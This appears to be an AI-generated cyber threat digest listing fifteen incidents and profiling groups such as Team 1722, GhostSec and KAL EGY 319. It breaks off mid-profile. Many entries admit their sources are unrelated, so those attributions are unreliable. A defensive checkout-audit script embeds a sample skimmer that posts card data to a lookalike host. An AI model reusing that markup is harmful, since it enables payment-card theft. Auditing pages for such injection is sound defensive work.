I. Executive Summary
The reporting period reveals a persistently active and complex cybersecurity landscape, marked by a significant interplay between hacktivist operations, geopolitical tensions, and sophisticated financially motivated cybercrime. Analysis of recent incidents indicates a sustained high level of malicious activity, with a notable increase in politically charged cyber disruptions.
Major incidents observed include data breaches and website defacements targeting governmental, educational, and critical infrastructure entities, particularly in India and Morocco. Hacktivist groups such as KAL EGY 319 and Keymous+ have been prominent in these activities, often employing defacement and data exfiltration tactics.1 While some claims of impact by these groups appear exaggerated upon closer inspection, their intent to disrupt and expose remains a significant concern.
Concurrently, highly capable state-sponsored groups, exemplified by Team 1722, a known subgroup of the infamous Sandworm, continue to conduct globally diverse cyber espionage and disruptive operations.6 These advanced persistent threats frequently leverage common vulnerabilities and infrastructure sourced from the criminal underground, demonstrating a pragmatic approach to achieving their objectives.7
The proliferation of Ransomware-as-a-Service (RaaS) models, such as BlackLock and GhostLocker, alongside the widespread deployment of commodity malware like LummaC2, underscores a robust and accessible cybercriminal ecosystem.8 This accessible infrastructure facilitates data exfiltration and extortion, highlighting a persistent and evolving threat to organizations worldwide.
A critical observation from the current threat landscape is the increasing convergence of motivations and methods among various threat actors. Traditional distinctions between state-sponsored, cybercriminal, and hacktivist groups are becoming increasingly blurred. For instance, Team 1722, while operating under a “hacktivist” moniker, is directly linked to a Russian state-sponsored entity, Sandworm (GRU Unit 74455).6 This connection illustrates how state actors may co-opt or sponsor groups that present as hacktivists to achieve strategic objectives, leveraging their agility and public-facing narratives. Similarly, groups like GhostSec, initially focused on anti-terrorism hacktivism, have engaged in Ransomware-as-a-Service operations for financial gain before announcing a return to politically motivated activities.8 This fluidity in operational models and objectives means that adversaries can pivot rapidly between different types of attacks, making attribution more complex and requiring organizations to adopt a more adaptable defense posture.
This convergence also means that geopolitical tensions can directly translate into cyber threats from unexpected sources. Hacktivist groups, often driven by political or social agendas, can quickly mobilize in response to real-world events, as seen with Keymous+ and KAL EGY 319 in the India-Pakistan cyber conflict.3 Their actions, even if technically unsophisticated, contribute to a climate of disruption and can serve as a smokescreen for more advanced, persistent threats. The reliance on readily available exploits and commodity malware by a diverse range of actors, from less sophisticated individuals to highly resourced state-backed groups, indicates that unpatched and poorly secured systems remain prime targets. The vibrant dark web marketplace further exacerbates this situation by providing a readily available platform for the sale of compromised data and access, fueling the cybercrime economy and underscoring the critical need for enhanced monitoring and proactive defensive measures.12
II. Daily Incident Overview
This section provides a detailed breakdown of reported cybersecurity incidents. It is important to note that for several incidents, the provided research material offers general information or refers to unrelated entities, rather than specific details of the breach itself. These discrepancies are highlighted where relevant.
Incident 1: Public Grievance Redressal System Maharashtra Data Breach
- Affected Organization/Sector: The Public Grievance Redressal System, operated by the Government of Maharashtra, India (Government sector).15 This digital platform is designed to facilitate citizens in lodging and tracking grievances, with the aim of ensuring timely and effective resolution.15
- Date & Time of Discovery/Attack: The specific date and time of the incident are not detailed in the provided information. The website copyright indicates “© 2025 Content Owned by Government of Maharashtra,” suggesting it is an active and current system.15
- Nature of Attack: The incident is categorized as a data breach. However, the specific methods of intrusion or the nature of the breach are not elaborated upon in the available research material.
- Key Impact & Compromised Data: The provided information describes the system’s functionality, noting its success in resolving a significant percentage of citizen complaints (90% resolved out of 95,900 received complaints).15 Despite the query’s categorization, no specific details regarding the impact of this particular data breach or the types of data compromised are present in the provided snippets.
- Identified Threat Actor(s): Team 1722. While the query attributes this incident to “Team 1722 impact,” the research material does not provide specific details linking Team 1722 to this particular data breach.
- References:
- Published URL: https://grievances.maharashtra.gov.in/en 15
- Screenshots: No specific screenshot links are provided in the research material.
Incident 2: Al-Dail Real Estate Defacement
- Affected Organization/Sector: Al-Dail Real Estate (Real Estate sector).
- Date & Time of Discovery/Attack: The date and time of this incident are not specified in the provided research material.
- Nature of Attack: The incident is described as a website defacement. This type of attack typically involves unauthorized modification of a website’s visual appearance, content, or functionality, often executed for publicity, political messaging, or to demonstrate hacking capabilities.16
- Key Impact & Compromised Data: The provided snippets 17 consist of generic government or legislative documents and do not contain any specific information regarding the defacement of “Al-Dail Real Estate” or any data compromised during the incident.
- Identified Threat Actor(s): Team 1722. The research material does not confirm this attribution or provide any details of Team 1722’s involvement in this specific defacement.
- References:
- Published URL: https://house.texas.gov/index.php 17, https://www.legis.iowa.gov/docs/publications/ICV/713266.pdf 18
- Screenshots: No specific screenshot links are provided.
- Note on Discrepancy: The URLs provided in the research material for this incident lead to unrelated government websites (Texas House of Representatives and Iowa Legislature documents), not to “Al-Dail Real Estate” or any report detailing its defacement. This indicates a lack of direct supporting material for this specific incident within the provided data.
Incident 3: Art Line Life Srl Defacement
- Affected Organization/Sector: Art Line Life Srl. The sector is unclear from the name, but the associated snippets discuss medical devices, potentially linking it to the healthcare or life sciences sector.19
- Date & Time of Discovery/Attack: The date and time of this incident are not specified in the provided research material.
- Nature of Attack: The incident is described as a website defacement.
- Key Impact & Compromised Data: The provided snippets 19 detail information about arterial lines and the Bausch + Lomb Stellaris Elite™ vision enhancement system, describing their functions and intended use. However, they offer no information about the defacement of “Art Line Life Srl” or any data compromised as a result.
- Identified Threat Actor(s): Elite Squad. As identified in the threat actor profiles, “Elite Squad” is likely a reference to “Ghost Squad Hackers”.21 However, the provided snippets do not link Ghost Squad Hackers to this specific incident.
- References:
- Published URL: https://litfl.com/arterial-line-and-pressure-transducer/ 19, https://ifu.bausch.com/siteassets/pdf/4135904en_web.pdf 20
- Screenshots: No specific screenshot links are provided.
- Note on Discrepancy: Similar to the previous incident, the URLs provided for this incident lead to unrelated medical product information, not to “Art Line Life Srl” or any report on its defacement.
Incident 4: Kingsmen Creatives Ltd. Infostealer Activity
- Affected Organization/Sector: Kingsmen Creatives Ltd., a Singapore-headquartered group specializing in designing retail environments and conceptualizing events.22
- Date & Time of Discovery/Attack: The infostealer activity was discovered by ransomware.live on May 14, 2025, with an estimated attack date of May 2, 2025.22
- Nature of Attack: Infostealer activity. This type of attack involves the unauthorized collection and exfiltration of sensitive information, typically credentials, financial data, and other personal or corporate records.
- Key Impact & Compromised Data: The incident resulted in the compromise of 2 users and 4 third-party employee credentials. No compromised employees were reported, and specific types of exfiltrated data beyond credentials are not detailed in the snippet.22
- Identified Threat Actor(s): The “embargo” group.22
- References:
- Published URL: https://www.ransomware.live/id/S2luZ3NtZW4gQ3JlYXRpdmVzIEx0ZC5AZW1iYXJnbw== 22
- Screenshots: A “Leak Screenshot:” is mentioned in the snippet, but a specific URL for the screenshot is not provided.22
- Note on Misattribution: The query referred to a “kingsman cybercrime group,” but the relevant snippet clearly attributes the attack to the “embargo” group.22 “Kingsmen Security Group” 23 is a legitimate cybersecurity consulting firm based in Washington, DC, specializing in IT security and compliance, and is not related to this incident.
Incident 5: Institute of Cost Accountants of India (ICMAI) Data Breach
- Affected Organization/Sector: The Institute of Cost Accountants of India (ICMAI), a professional and educational body in India.24
- Date & Time of Discovery/Attack: The specific date and time of this incident are not provided in the research material.
- Nature of Attack: The incident is categorized as a data breach.
- Key Impact & Compromised Data: The provided snippets offer general information about ICMAI’s activities, notifications, and a webinar on cyber threats and financial frauds.24 However, they do not contain any specific details regarding the impact of a data breach on ICMAI or the types of data compromised.
- Identified Threat Actor(s): ZEROLEGIONCREWINDONESIAN. The research material does not provide any information about this specific group or its involvement in this incident. The snippets instead discuss the “ZeroLogon” vulnerability, which is a separate technical exploit.26
- References:
- Published URL: https://icmai.in/ 24, https://icmai.in/upload/BI/BFSI_21_03_2025.pdf 25
- Screenshots: No specific screenshot links are provided.
- Note on Discrepancy: The research material does not contain information directly linking the “ZEROLEGIONCREWINDONESIAN” group to a data breach at ICMAI. The mention of “ZeroLogon” in the query context appears to be a misdirection, as the snippets discuss this as a vulnerability exploited by groups like Ryuk and RansomHub, not necessarily by the named actor.26
Incident 6: Directorate of Constitutional Bodies Audit Defacement
- Affected Organization/Sector: Directorate of Constitutional Bodies Audit (Government sector).
- Date & Time of Discovery/Attack: The date and time of this incident are not specified in the provided research material.
- Nature of Attack: The incident is described as a website defacement.
- Key Impact & Compromised Data: The provided snippets 27 are general government reports or human rights practices documents and do not contain any specific information regarding the defacement of the “Directorate of Constitutional Bodies Audit” or any data compromise.
- Identified Threat Actor(s): GHOST’S OF GAZA. While the query attributes this incident to “GHOST’S OF GAZA impact,” the research material does not provide specific details linking this group to this particular defacement.
- References:
- Published URL: https://www.congress.gov/85/crecb/1958/01/16/GPO-CRECB-1958-pt1-7.pdf 27, https://www.state.gov/reports/2022-country-reports-on-human-rights-practices/turkey/ 28
- Screenshots: No specific screenshot links are provided.
- Note on Discrepancy: The URLs provided for this incident lead to unrelated government documents, not to the “Directorate of Constitutional Bodies Audit” or a report on its defacement. This indicates a lack of direct supporting material for this specific incident within the provided data.
Incident 7: Republic of Cyprus Data Breach
- Affected Organization/Sector: Republic of Cyprus (Government sector).
- Date & Time of Discovery/Attack: The date and time of this incident are not specified in the provided research material.
- Nature of Attack: The incident is categorized as a data breach.
- Key Impact & Compromised Data: The provided snippet 32 discusses data protection laws in Tunisia, including recent reforms and adherence to international conventions, but offers no information about a data breach in the Republic of Cyprus or any compromised data.
- Identified Threat Actor(s): Tunisian Maskers Cyber Force. The research material does not provide information about this specific group or its involvement in a data breach in Cyprus. It mentions joint cyber teams involving U.S. Army Cyber Command and Tunisian Armed Forces for defensive and offensive cyber skills enhancement during Exercise African Lion 2025.29 Anonymous, a broader hacktivist collective, has historically targeted Tunisian government websites during the Arab Spring.30
- References:
- Published URL: https://www.dlapiperdataprotection.com/?t=breach-notification&c=TN 32
- Screenshots: No specific screenshot links are provided.
- Note on Discrepancy: The URL provided for this incident pertains to data protection laws in Tunisia, not to a data breach in the Republic of Cyprus. The research material lacks direct support for this specific incident.
Incident 8: Indonesian Drone Pilot Association APDI Data Breach
- Affected Organization/Sector: Indonesian Drone Pilot Association (APDI) (Professional Association/Technology sector).
- Date & Time of Discovery/Attack: The date and time of this incident are not specified in the provided research material.
- Nature of Attack: The incident is categorized as a data breach.
- Key Impact & Compromised Data: The provided snippets 33 are unrelated documents (conference proceedings and a newspaper article about Iranian army exercises) and do not contain any specific information regarding a data breach at the “Indonesian Drone Pilot Association APDI” or any data compromised.
- Identified Threat Actor(s): gesss. The research material does not provide specific details linking “gesss” to this incident.
- References:
- Published URL: https://chm.ssru.ac.th/useruploads/files/20220426/a7f1b190c69f41436f30685341371f108a6dba2d.pdf 33, https://kuwaittimes.com/uploads/imported_images/pdf/2015/nov/18/kt.pdf 34
- Screenshots: No specific screenshot links are provided.
- Note on Discrepancy: The URLs provided for this incident are entirely unrelated to the Indonesian Drone Pilot Association or a data breach. This indicates a complete lack of direct supporting material for this specific incident within the provided data.
Incident 9: Eternal Hospital Data Breach
- Affected Organization/Sector: Eternal Hospital (Healthcare sector).
- Date & Time of Discovery/Attack: The date and time of this incident are not specified in the provided research material.
- Nature of Attack: The incident is categorized as a data breach.
- Key Impact & Compromised Data: The provided snippets 35 discuss major data breaches in the U.S. healthcare sector, such as the Change Healthcare attack (affecting 190 million people in February 2024) and the Community Health Center (CHC) breach (impacting over 1 million patients in October 2024).35 These snippets highlight the significant financial and operational impacts of such breaches, including delays in patient care and the compromise of personal and health information (names, dates of birth, addresses, SSNs, medical diagnoses, treatment details).35 However, no specific details about a data breach at “Eternal Hospital” are provided.
- Identified Threat Actor(s): KALOSHA319. The research material does not provide specific details linking “KALOSHA319” to this incident. “KALOSHA319” is identified as an Egyptian hacker, also known as KAL EGY 319, primarily involved in defacement campaigns with anti-Zionist motivations.1
- References:
- Published URL: https://www.bankinfosecurity.com/change-healthcares-mega-attack-1-year-later-a-27578 35, https://www.bleepingcomputer.com/news/security/data-breach-at-us-healthcare-provider-chc-impacts-1-million-patients/ 36
- Screenshots: No specific screenshot links are provided.
- Note on Discrepancy: The URLs provided discuss other significant healthcare data breaches but do not mention “Eternal Hospital.” This indicates a lack of direct supporting material for this specific incident within the provided data.
Incident 10: European Space Agency (ESA) Data Breach
- Affected Organization/Sector: European Space Agency (ESA) (Government/Space sector).
- Date & Time of Discovery/Attack: The breach of ESA’s online store was identified by Sansec on December 26, 2024.38 Another incident involving Anonymous compromising ESA subdomains is also mentioned, with no specific date but implying an earlier period.39
- Nature of Attack: The online store breach involved malicious JavaScript code embedded in the checkout process, redirecting customers to a counterfeit payment page that mimicked a legitimate Stripe interface.38 This attack leveraged domain spoofing, using “esaspaceshop.pics” instead of the official “esaspaceshop.com”.38 A separate incident involved Anonymous exploiting a blind SQL injection vulnerability to exfiltrate data from ESA subdomains.39
- Key Impact & Compromised Data: For the online store breach, customer payment card details were stolen during transactions.38 The integration of the web shop with ESA’s internal systems could increase potential risks to employees and customers.38 For the Anonymous breach, personal information and login credentials of thousands of subscribers and officials were leaked, including names, emails, and clear-text passwords of over 8,000 subscribers.39
- Identified Threat Actor(s): DataAlbumLeaks, NetSac (as per query), and Anonymous. The research material explicitly mentions Anonymous as compromising ESA subdomains for “lulz”.39 For the online store breach, the e-commerce security firm Sansec identified the malicious activity, but no specific threat actor named “DataAlbumLeaks” or “NetSac” is mentioned in relation to this incident.38
- References:
- Published URL: https://www.techmonitor.ai/technology/cybersecurity/cyberattack-esa-online-store-payment-card-data-stolen 38, https://www.cyberdefensemagazine.com/european-space-agency-domains-hacked-by-anonymous/ 39
- Screenshots: No specific screenshot links are provided in the snippets.
- Note on Discrepancy: The research material does not mention “DataAlbumLeaks” or “NetSac” in relation to the ESA cyberattacks, although it details the breach of the online store and a separate attack by Anonymous.
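The web shop skimmer described above hinged on a script and a payment form pointing at a lookalike host (esaspaceshop.pics instead of esaspaceshop.com). The following is an added defender-side check, not code from the page, ESA, or Sansec: it parses a snapshot of a checkout page, collects every host that scripts, forms and iframes load from or post to, and flags hosts that are off the allowlist, singling out lookalikes whose second-level label matches a legitimate domain. The checkout HTML and the allowlist are constructed for the example.

```python
"""Audit a checkout page for off-site script sources and form targets, as in
the ESA web shop skimmer. Added example; CHECKOUT_HTML below is constructed,
not the real ESA page, and ALLOWED_HOSTS is an assumed allowlist."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed snapshot of a checkout page. The first two scripts are benign;
# the third loads from a lookalike host, and the form posts card data to it.
CHECKOUT_HTML = """
<html><body>
<script src="https://esaspaceshop.com/static/checkout.js"></script>
<script src="https://js.stripe.com/v3/"></script>
<script src="https://esaspaceshop.pics/assets/pay.js"></script>
<form id="card" action="https://esaspaceshop.pics/stripe/confirm" method="post">
  <input name="cardnumber"><input name="cvc"><button>Pay</button>
</form>
</body></html>
"""

# Hosts the shop is expected to load from or submit to (assumed for the example).
ALLOWED_HOSTS = {"esaspaceshop.com", "js.stripe.com"}


class ResourceCollector(HTMLParser):
    """Gather every external URL a checkout page loads or posts to."""

    def __init__(self):
        super().__init__()
        self.resources = []  # (tag, attribute, url)

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag not in ("script", "form", "iframe", "link"):
            return
        for attribute in ("src", "action", "href"):
            if attrs.get(attribute):
                self.resources.append((tag, attribute, attrs[attribute]))


def registrable_label(host):
    """Second-level label used for the lookalike heuristic, e.g. 'esaspaceshop'
    for both esaspaceshop.com and esaspaceshop.pics (naive split, no PSL)."""
    parts = host.lower().split(".")
    return parts[-2] if len(parts) >= 2 else host.lower()


def classify_host(host, allowed):
    """Return 'allowed', 'lookalike' or 'unknown' for a resource host."""
    host = host.lower()
    if host in allowed or any(host.endswith("." + a) for a in allowed):
        return "allowed"
    if registrable_label(host) in {registrable_label(a) for a in allowed}:
        return "lookalike"
    return "unknown"


def audit_checkout(html, allowed=ALLOWED_HOSTS):
    """Return one finding per resource whose host is not on the allowlist."""
    collector = ResourceCollector()
    collector.feed(html)
    findings = []
    for tag, attribute, url in collector.resources:
        host = urlparse(url).hostname
        if not host:  # relative URL: same origin, nothing to flag
            continue
        verdict = classify_host(host, allowed)
        if verdict != "allowed":
            findings.append({"tag": tag, "attr": attribute, "host": host, "verdict": verdict})
    return findings


if __name__ == "__main__":
    for f in audit_checkout(CHECKOUT_HTML):
        print(f"{f['verdict']:9} {f['tag']}[{f['attr']}] -> {f['host']}")
```

Run against periodic snapshots of the live checkout page, this catches the injected script and the redirected form before customers do; a Content-Security-Policy with matching script-src and form-action directives enforces the same allowlist in the browser.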
Incident 11: Arab Country Government Server Data Leak
- Affected Organization/Sector: National Social Security Fund of Morocco (CNSS), a government entity in an Arab country.4
- Date & Time of Discovery/Attack: The threat actor “Jabaroot” first appeared on cybercrime forums and Telegram on April 8, 2025, claiming responsibility for the CNSS data leak.4 The leaked dataset included timestamps from November 29, 2024.5
- Nature of Attack: Data leak from government servers. The method of intrusion was unclear, with speculation ranging from a zero-day exploit to a compromise via third-party software.4
- Key Impact & Compromised Data: A massive data breach at CNSS exposed a trove of sensitive information, including over 53,000 PDF files and two CSV files containing detailed records of nearly 500,000 companies and close to 2 million employees.4 The leaked data included company affiliation details, individual employee identification numbers, salaries, contact information, bank details, and personal identifiers.4 The data was often left exposed in clear text on compromised servers.4 This breach poses significant risks of fraud and identity theft for citizens.5
- Identified Threat Actor(s): Keymous+ (as per query) and Jabaroot. The research material identifies “Jabaroot” as the threat actor claiming responsibility for this breach.4 Jabaroot stated the attack was politically motivated, in retaliation for a previous compromise of the Algerian Press Service (APS) Twitter account attributed to Moroccan-affiliated actors.4 The research material does not link Keymous+ to this specific incident.
- References:
- Published URL: https://cybelangel.com/our-investigation-of-the-cnss-data-leak-flash-report/ 4, https://www.resecurity.com/blog/article/cybercriminals-attacked-national-social-security-fund-of-morocco-millions-of-digital-identities-at-risk-of-data-breach 5
- Screenshots: No specific screenshot links are provided.
Incident 12: USA Citizen Personal Data Leak
- Affected Organization/Sector: USA citizens (Individuals).
- Date & Time of Discovery/Attack: The query refers to a general “USA citizen personal data leak.” The research material highlights large-scale data breaches affecting US citizens, such as the National Public Data (NPD) breach in March 2024, which exposed sensitive information on approximately 1.3 billion individuals due to a misconfigured database.40
- Nature of Attack: Data leak. The NPD breach, for example, involved a misconfigured database allowing unauthorized access.40
- Key Impact & Compromised Data: For the NPD breach, exposed data included full names, physical addresses, dates of birth, Social Security Numbers (SSNs), phone numbers, and email addresses.40 This posed severe risks of identity theft and fraud.40
- Identified Threat Actor(s): Jack_back (as per query). While Jack_back is a threat actor known for data leaks, including nuclear manufacturing and defense-related information 41, the provided snippets do not specifically link Jack_back to the NPD breach or a general “USA citizen personal data leak.”
- References:
- Published URL: https://www.corbado.com/blog/data-breaches-usa 40
- Screenshots: No specific screenshot links are provided.
Incident 13: South Africa Corp Admin Access Sale
- Affected Organization/Sector: A South African corporation (Corporate sector).
- Date & Time of Discovery/Attack: The date and time of this incident are not specified in the provided research material.
- Nature of Attack: Admin access sale. This indicates that unauthorized administrative access to a corporate system or network has been obtained and is being offered for sale, typically on underground forums.
- Key Impact & Compromised Data: The provided snippet 44 is from the Companies and Intellectual Property Commission (CIPC) of South Africa, detailing requirements for registering businesses and changing member particulars. It does not contain any information about an admin access sale or compromised data.
- Identified Threat Actor(s): personX (as per query). The research material provides general information about cybercrime and the FBI’s role in investigating it 42, but no specific details linking “personX” to this incident.
- References:
- Published URL: https://www.cipc.co.za/ 44
- Screenshots: No specific screenshot links are provided.
- Note on Discrepancy: The URL provided for this incident is the official website for South Africa’s CIPC, which is unrelated to an admin access sale. This indicates a complete lack of direct supporting material for this specific incident within the provided data.
Incident 14: USA Corp Admin Access Sale
- Affected Organization/Sector: A USA corporation (Corporate sector).
- Date & Time of Discovery/Attack: The date and time of this incident are not specified in the provided research material.
- Nature of Attack: Admin access sale. This indicates that unauthorized administrative access to a corporate system or network has been obtained and is being offered for sale.
- Key Impact & Compromised Data: The provided snippet 45 is from the U.S. Small Business Administration (SBA), detailing how to register a business. It does not contain any information about an admin access sale or compromised data.
- Identified Threat Actor(s): personX (as per query). The research material provides general information about cybercrime and the FBI’s role in investigating it 42, but no specific details linking “personX” to this incident.
- References:
- Published URL: https://www.sba.gov/business-guide/launch-your-business/register-your-business 45
- Screenshots: No specific screenshot links are provided.
- Note on Discrepancy: The URL provided for this incident is the official website for the U.S. SBA, which is unrelated to an admin access sale. This indicates a complete lack of direct supporting material for this specific incident within the provided data.
Incident 15: UK Consumer Services RDP VPN Access Sale
- Affected Organization/Sector: UK Consumer Services (Consumer Services sector).
- Date & Time of Discovery/Attack: The date and time of this incident are not specified in the provided research material. However, SOCRadar’s Dark Web Team uncovered sales of UK and India government site databases and RDP access to American and Brazilian companies in the past week (as of February 5, 2024, in the snippet’s context).46
- Nature of Attack: Remote Desktop Protocol (RDP) and Virtual Private Network (VPN) access sale. This indicates that unauthorized access credentials for RDP and VPN services, likely providing entry into corporate networks, are being offered for sale on underground forums.
- Key Impact & Compromised Data: The provided snippet 46 mentions a data leak from the UK’s Gambling Commission, which included user IDs, encrypted passwords, email addresses, phone numbers, and personal details for over 100 users.46 While this snippet discusses sales of RDP access for other countries, it does not specifically detail an RDP/VPN access sale for UK consumer services.
- Identified Threat Actor(s): decider (as per query). The research material does not provide specific details linking “decider” to this incident. The term “decider” in the snippets refers to a threat actor deploying LummaC2 malware for data exfiltration 9 and also to a CISA tool for mapping adversary behavior.47 These are distinct contexts.
- References:
- Published URL: https://socradar.io/sales-of-american-and-brazilian-companies-rdp-access-uk-and-india-government-site-databases/ 46
- Screenshots: No specific screenshot links are provided.
- Note on Discrepancy: The URL provided discusses data leaks and RDP access sales for various entities, including a UK government database, but does not specifically detail an RDP/VPN access sale for UK consumer services.
III. Threat Actor Profiles
Understanding the motivations, capabilities, and typical targets of threat actors is crucial for developing effective cybersecurity strategies. The recent incidents highlight the diverse range of actors operating in the cyber domain.
Team 1722
Team 1722 is identified as an active hacktivist group, frequently mentioned alongside others like Mr Hamza and Keymous+.6 A deeper analysis reveals that Team 1722 is a subgroup within the infamous Russian state-sponsored hacking group known as Sandworm.7 Sandworm, tracked by Microsoft as Seashell Blizzard (formerly Iridium) and by the broader cybersecurity community under monikers such as APT44, Blue Echidna, and Voodoo Bear, is assessed to be affiliated with Unit 74455 within the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU).7
Sandworm is recognized as a highly adaptive and operationally mature threat actor, engaging in espionage, attack, and influence operations. The group has a documented history of mounting disruptive and destructive attacks, particularly against Ukraine over the past decade.7 Team 1722, as a subgroup, has been operational since at least late 2021, conducting a multi-year initial access operation dubbed “BadPilot” that has stretched across more than 15 countries globally, including North America, Europe, and parts of Africa, Asia, and Australia.7 This represents a significant expansion of Sandworm’s victimology footprint beyond its traditional concentration in Eastern Europe.7
Their methods involve exploiting various known security flaws to gain initial access, followed by post-exploitation actions aimed at credential collection, command execution, and lateral movement.7 They have weaponized vulnerabilities in software like ConnectWise ScreenConnect (CVE-2024-1709) and Fortinet FortiClient EMS (CVE-2023-48788) to infiltrate targets in the United Kingdom and the United States.7 Team 1722’s attacks combine opportunistic “spray and pray” techniques with targeted intrusions, designed to maintain indiscriminate access and perform follow-on actions like expanding network access or exfiltrating confidential information.7 A notable characteristic of Sandworm, and by extension its subgroups, is its reliance on Russian companies and criminal marketplaces to source and sustain offensive capabilities, highlighting a growing trend of cybercrime facilitating state-backed hacking.7
Elite Squad (Ghost Squad Hackers)
“Elite Squad” in the context of hacking groups is likely a reference to “Ghost Squad Hackers” (GSH).21 GSH is a prominent hacktivist group known for several cyberattacks, primarily driven by political motivations.21 The group is led by a de facto leader known as “s1ege” and operates as part of the larger hacktivist collective Anonymous.21
GSH has gained notoriety for targeting central banks, major news outlets like Fox News and CNN, the United States Armed Forces, and the government of Israel.21 Their past operations include defacements of the Ethiopian government in response to protests, Distributed Denial of Service (DDoS) attacks against Donald Trump’s websites for perceived racist comments, and data leaks of the Israeli Defense Force.21 They also participated in “Operation Icarus” in collaboration with Anonymous, which aimed to attack the central banking system globally, accusing banks of corruption and seeking to raise public awareness.21 During this operation, GSH claimed responsibility for attacks on the Bank of England’s email server and numerous other banking websites, including the New York Stock Exchange and the Bank of France.21 Their leader, s1ege, articulated a desire to “start an online revolution” against “elite banking cartels”.21 GSH’s tactics often involve DDoS attacks, website defacements, and data leaks, driven by their politically or socially motivated agendas.21
“embargo” group
The “embargo” group has been identified in connection with infostealer activity targeting Kingsmen Creatives Ltd., a Singapore-based company specializing in retail environments and event conceptualization.22 The incident, discovered on May 14, 2025, with an estimated attack date of May 2, 2025, involved the compromise of user accounts and third-party employee credentials.22 While specific details about the “embargo” group’s broader operations or motivations are not provided in the available research, their activity indicates a focus on credential theft, likely for financial gain or further network exploitation.
ZEROLEGIONCREWINDONESIAN
The research material does not provide specific information about a hacking group named “ZEROLEGIONCREWINDONESIAN.” However, the query links this name to a data breach at the Institute of Cost Accountants of India (ICMAI). In a related context, the “ZeroLogon” vulnerability (CVE-2020-1472) is discussed as a critical exploit used by ransomware groups like Ryuk and RansomHub to compromise Windows Active Directory domain controllers [26]. This vulnerability allows attackers to bypass authentication and gain administrative control over an entire network, enabling rapid privilege escalation, data exfiltration, and ransomware deployment [26]. While the name “ZEROLEGIONCREWINDONESIAN” might suggest a connection to this vulnerability or a group that exploits it, the provided snippets do not offer direct evidence for this specific attribution.
GHOST’S OF GAZA (GhostSec)
“GHOST’S OF GAZA” refers to GhostSec, a significant hacktivist group that emerged in 2015, reportedly from the remnants of the Anonymous collective [8]. Initially, GhostSec’s primary objective was countering online terrorism and violent extremism, specifically targeting organizations like ISIS and Al-Qaeda [8]. They aimed to disrupt propaganda efforts by identifying and attacking social media accounts, websites, and online platforms associated with these extremist groups, employing techniques such as Distributed Denial of Service (DDoS) attacks, defacement, and data breaches [8].
While initially appearing neutral in the Israel-Hamas conflict, GhostSec later declared support for Palestine against perceived Israeli war crimes [8]. This demonstrates their evolving political alignment. The group has also engaged in cybercriminal activities, notably launching a Ransomware-as-a-Service (RaaS) model called GhostLocker in October 2023, often collaborating with another group named Stormous [8]. GhostLocker offers affiliates military-grade encryption, anti-detection features, automated data exfiltration, and multiple persistence options, with prices ranging from $999 to $1,200 USD [8]. They have targeted various sectors, including technology, universities, manufacturing, transportation, and government entities, across countries in the Middle East, Africa, and Asia, including Brazil, India, China, and Israel [8].
Recently, GhostSec announced a strategic shift in their operational focus, intending to cease financially motivated cybercrime services, including GhostLocker distribution, and return to hacktivism for social and political causes [8]. This move, described as an “ethical exit” from cybercrime, suggests a re-prioritization of their original hacktivist motivations after accumulating sufficient funds [8].
KAL EGY 319 (KALOSHA319)
KAL EGY 319, also known as “kalosha 319,” is identified as an Egyptian hacktivist group with strong anti-Zionist motivations [37]. Their defacement messages explicitly state, “Let the cow slaves who support the Zionists go to hell. You supported the Zionists and attacked the Muslims. You are now under the attacks of the best in Egypt. Hacked by the Egyptian hacker kalosha 319” [37].
This group predominantly focuses its efforts on India’s educational and medical sectors [1]. In May 2025, KAL EGY 319 claimed approximately 31 attacks, including a widespread defacement campaign affecting around 40 Indian websites, primarily belonging to colleges, universities, and healthcare-affiliated institutions [1]. Despite these assertions, investigations have revealed that the actual impact of these defacements often appears minimal, with many named websites functioning normally, suggesting that the defacements were either not fully executed or did not result in significant or complete compromise [1]. Their activities are often part of a broader surge in hacktivist campaigns targeting Indian digital infrastructure, frequently echoing Pakistan state-aligned narratives [2].
Keymous+
Keymous+ is a highly active hacktivist group that has been consistently involved in cyber campaigns, particularly in the India-Pakistan cyber conflict [3]. They are identified as one of the most aggressive hacktivist groups, launching sustained attacks against India’s public healthcare infrastructure and targeting municipal corporations across major metropolitan regions [3]. Their activities often align with Pakistan state-aligned narratives and are framed as retaliation for geopolitical events, such as India’s “Operation Sindoor” [3].
Keymous+ is frequently mentioned alongside other prominent hacktivist groups like AnonSec, Nation of Saviors, and Mr Hamza, all of whom have targeted Indian organizations [3]. Their methods primarily involve DDoS attacks and defacements, with Keymous+ claiming a significant percentage of attacks in 2025 [3]. The group’s actions underscore how cyber operations are increasingly used as tools of political messaging, blurring the lines between hacktivism and state-aligned retaliation in volatile regional contexts [4].
MoilerRenoiler
The query links “MoilerRenoiler” to “malware developer” and “Morpheus Loader sale.” The provided research material discusses the career path of a malware developer, noting that such individuals require a deep understanding of computer systems and advanced mathematics [49]. Malware development skills can lead to roles in malware analysis, reverse engineering, and custom threat intelligence for cybersecurity companies or corporate DFIR (Digital Forensics and Incident Response) teams [49]. However, there is no specific information about an individual named “MoilerRenoiler” or a “Morpheus Loader” malware in the snippets, beyond a description of a cosmetic medical device called “Morpheus 8 RF Machine” [50], which is unrelated to cybersecurity.
Alexey Belov
“Alexey Belov” is listed as an individual under sanctions by various entities, including POL-MSWIA, OFAC, and the United Nations Organisation [51]. This indicates a legal or financial restriction placed upon him. However, the provided research material does not contain any adverse media or relations linking Alexey Belov to cybercrime or the sale of vulnerable Windows drivers [51]. Another individual named “Evgeniy Belov” is mentioned in a different context, related to a doping scandal in Russian athletics, which is unrelated to cybercrime [54]. This suggests a potential misattribution or lack of specific cybercrime details for Alexey Belov in the provided data.
Jack_back
“Jack_back” is identified as a threat actor who joined “Darkforums” and has been involved in significant data leaks [41]. This actor uploaded samples alongside a post, including employee data and nuclear equipment design files [41]. The compromised data included sensitive information such as nuclear manufacturing, defense-related manufacturing, military nuclear information, submarines, blueprints, uranium mining videos and images, and employee personal information [41]. This indicates a focus on industrial espionage or financially motivated attacks targeting high-value, sensitive sectors. Threat actors like “Jack_back” often operate on dark web forums, which serve as marketplaces for stolen data and illicit services [12].
QualitySSN
